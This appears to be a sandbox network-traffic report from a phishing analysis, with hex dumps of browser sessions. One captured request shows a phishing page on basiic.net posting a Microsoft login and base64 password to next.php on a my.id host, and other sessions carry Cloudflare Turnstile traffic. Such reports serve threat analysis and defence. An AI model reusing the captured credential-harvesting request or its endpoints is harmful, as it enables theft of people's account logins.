                                                                                                                  Data Ascii: (154)][jR(1661)](j,H)||(j[H]=[]),j[H][jR(894)](G)}},gH=gL(518)[gL(474)](';'),gI=gH[gL(755)][gL(746)](gH),eM[gL(1565)]=function(g,h,jU,i,j,k,l,m){for(jU=gL,i={'nIbUS':jU(748),'QYiFp':jU(635),'aEnMz':function(n,o){return n+o},'JskGg':function(n,o){return n<
                                                                                                                  2024-10-22 14:10:02 UTC1369INData Raw: 6e 20 68 28 69 29 7d 2c 27 45 4f 61 62 55 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 77 56 6c 4b 76 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2a 69 7d 2c 27 6f 67 72 41 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 69 7d 2c 27 79 54 48 71 67 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 57 61 67 67 59 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 2a 68 7d 2c 27 52 45 69 74 66 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 6b 75 7a 63 54 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 6c 54 6c 55 6c 27
                                                                                                                  Data Ascii: n h(i)},'EOabU':function(h,i){return h>i},'wVlKv':function(h,i){return h*i},'ogrAN':function(h,i){return h!=i},'yTHqg':function(h,i){return i&h},'WaggY':function(h,i){return i*h},'REitf':function(h,i){return i&h},'kuzcT':function(h,i){return h(i)},'lTlUl'


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  82192.168.2.1649854104.18.95.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:10:02 UTC1165OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1663307380:1729602922:dyPvKmin_wzAo2C88WuK9CW0ZVzLH_3eb5wHWsr8Qrk/8d6a11797f676b79/me1tc4vUmkicP8.VscZFk3.OWoJoK2idGfDErTidurQ-1729606199-1.1.1.1-TJXXa8B2Pog9OrwwlbuL93z7hRM2wMysKwxKfW88AF7R.yK_axu992q9wTMsHQ6f HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  Content-Length: 3308
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  Content-type: application/x-www-form-urlencoded
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  CF-Challenge: me1tc4vUmkicP8.VscZFk3.OWoJoK2idGfDErTidurQ-1729606199-1.1.1.1-TJXXa8B2Pog9OrwwlbuL93z7hRM2wMysKwxKfW88AF7R.yK_axu992q9wTMsHQ6f
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Origin: https://challenges.cloudflare.com
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv3/ft_4y_PuFbfD3r8D/nu8l3/0x4AAAAAAAgk0nqtAQ4g0A4d/auto/fbE/normal/auto/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:10:02 UTC3308OUTData Raw: 76 5f 38 64 36 61 31 31 37 39 37 66 36 37 36 62 37 39 3d 39 4a 76 64 32 64 4b 64 38 64 63 64 32 67 69 41 67 69 49 64 67 71 38 6d 32 72 67 50 78 67 55 55 69 6a 37 69 38 53 64 69 66 69 6b 64 39 6d 44 55 69 33 64 74 49 76 64 38 6f 4f 76 69 6d 64 76 4a 67 37 61 44 76 64 69 6f 68 69 74 76 44 4f 69 6c 35 69 6b 38 37 5a 76 78 69 75 64 44 6e 52 69 75 37 53 44 50 63 64 38 35 69 62 6f 59 5a 50 77 69 61 31 58 39 2d 69 6c 77 35 44 61 69 5a 46 2d 6a 71 54 55 71 67 4b 32 6b 51 4a 69 73 55 4c 36 45 53 4f 69 32 4b 69 66 55 6c 6a 4b 64 44 51 32 69 69 39 59 67 74 53 46 41 78 47 39 72 39 25 32 62 46 53 2b 36 67 53 44 58 69 44 4b 6d 55 72 51 6e 5a 47 6e 48 6d 53 69 54 39 69 44 6b 69 67 78 61 6c 38 64 69 76 71 64 4c 6d 53 69 33 69 74 74 71 6f 45 53 69 4b 53 69 30 69 6c 6f 71
                                                                                                                  Data Ascii: v_8d6a11797f676b79=9Jvd2dKd8dcd2giAgiIdgq8m2rgPxgUUij7i8Sdifikd9mDUi3dtIvd8oOvimdvJg7aDvdiohitvDOil5ik87ZvxiudDnRiu7SDPcd85iboYZPwia1X9-ilw5DaiZF-jqTUqgK2kQJisUL6ESOi2KifUljKdDQ2ii9YgtSFAxG9r9%2bFS+6gSDXiDKmUrQnZGnHmSiT9iDkigxal8divqdLmSi3ittqoESiKSi0iloq
                                                                                                                  2024-10-22 14:10:02 UTC434INHTTP/1.1 400 Bad Request
                                                                                                                  Date: Tue, 22 Oct 2024 14:10:02 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 14
                                                                                                                  Connection: close
                                                                                                                  cf-chl-out: fP0kditABs8I0p2fHTNjrNEo92SFM87TF/tTuIPRHtq3kRjJSoIVUHCs+/PoHsEoT/MkONBhQ3hSyRvx2yQrbwn5$/iiTp2bvf7h8X+Hi
                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a118f19fee71e-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:10:02 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 31 30 32 30 30 7d
                                                                                                                  Data Ascii: {"err":110200}


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  83192.168.2.1649856162.241.71.1264432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:10:05 UTC696OUTPOST /next.php HTTP/1.1
                                                                                                                  Host: 5102487645.my.id
                                                                                                                  Connection: keep-alive
                                                                                                                  Content-Length: 47
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  Accept: application/json, text/javascript, */*; q=0.01
                                                                                                                  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Origin: https://apeidieppe-d.basiic.net
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Referer: https://apeidieppe-d.basiic.net/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:10:05 UTC47OUTData Raw: 64 6f 3d 6c 6f 67 69 6e 26 75 73 65 72 3d 6d 40 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 26 70 61 73 73 3d 64 6d 6c 73 59 57 6c 75 4e 6a 59 3d
                                                                                                                  Data Ascii: do=login&user=m@microsoft.com&pass=dmlsYWluNjY=
                                                                                                                  2024-10-22 14:10:10 UTC292INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:10:04 GMT
                                                                                                                  Server: Apache
                                                                                                                  Access-Control-Allow-Origin: https://apeidieppe-d.basiic.net
                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                  Access-Control-Max-Age: 86400
                                                                                                                  Connection: close
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  2024-10-22 14:10:10 UTC79INData Raw: 34 34 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 59 6f 75 72 20 61 63 63 6f 75 6e 74 20 6f 72 20 70 61 73 73 77 6f 72 64 20 69 73 20 69 6e 63 6f 72 72 65 63 74 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 44{"status":"error","message":"Your account or password is incorrect"}0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  84192.168.2.1649859162.241.71.1264432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:10:08 UTC719OUTGET /next.php HTTP/1.1
                                                                                                                  Host: 5102487645.my.id
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: PHPSESSID=69f617384d08c6c83f3a20d1d5f3410a
                                                                                                                  2024-10-22 14:10:08 UTC150INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:10:07 GMT
                                                                                                                  Server: Apache
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  85192.168.2.1649863162.241.71.1264432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:10:11 UTC400OUTGET /next.php HTTP/1.1
                                                                                                                  Host: 5102487645.my.id
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: PHPSESSID=69f617384d08c6c83f3a20d1d5f3410a
                                                                                                                  2024-10-22 14:10:11 UTC150INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:10:10 GMT
                                                                                                                  Server: Apache
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  86192.168.2.1649865104.18.95.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:10:14 UTC814OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv4/3XIyTgfM2rEpHtYU/nu8l3/0x4AAAAAAAgk0nqtAQ4g0A4d/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                  Sec-Fetch-Dest: iframe
                                                                                                                  Referer: https://5102487645.my.id/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:10:14 UTC1368INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:10:14 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Content-Length: 26707
                                                                                                                  Connection: close
                                                                                                                  referrer-policy: same-origin
                                                                                                                  permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                  critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                  document-policy: js-profiling
                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                  content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                                                                                  cross-origin-embedder-policy: require-corp
                                                                                                                  origin-agent-cluster: ?1
                                                                                                                  cross-origin-opener-policy: same-origin
                                                                                                                  2024-10-22 14:10:14 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 36 61 31 31 64 37 34 64 65 33 65 38 33 62 2d 44 46 57 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: Server: cloudflareCF-RAY: 8d6a11d74de3e83b-DFWalt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:10:14 UTC1288INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                                  Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                                  2024-10-22 14:10:14 UTC1369INData Raw: 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69
                                                                                                                  Data Ascii: den;padding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:anti
                                                                                                                  2024-10-22 14:10:14 UTC1369INData Raw: 20 6c 69 6e 65 7b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b
                                                                                                                  Data Ascii: line{stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;
                                                                                                                  2024-10-22 14:10:14 UTC1369INData Raw: 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c
                                                                                                                  Data Ascii: #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #chal
                                                                                                                  2024-10-22 14:10:14 UTC1369INData Raw: 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c
                                                                                                                  Data Ascii: me-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-helper-l
                                                                                                                  2024-10-22 14:10:14 UTC1369INData Raw: 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 75 6f 34 73 36 66 64 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 7d 74 6f 7b 66 69
                                                                                                                  Data Ascii: -dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.uo4s6fd{0%{fill:#de1303;stroke:#de1303}to{fi
                                                                                                                  2024-10-22 14:10:14 UTC1369INData Raw: 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 6c 6f 67 6f 7b
                                                                                                                  Data Ascii: x-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-compact #logo{
                                                                                                                  2024-10-22 14:10:14 UTC1369INData Raw: 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 78 2d 73 74 61 72 74 3b 6a 75 73
                                                                                                                  Data Ascii: x}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:flex-start;jus
                                                                                                                  2024-10-22 14:10:14 UTC1369INData Raw: 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 33 70 78 3b 73 74 72 6f 6b 65
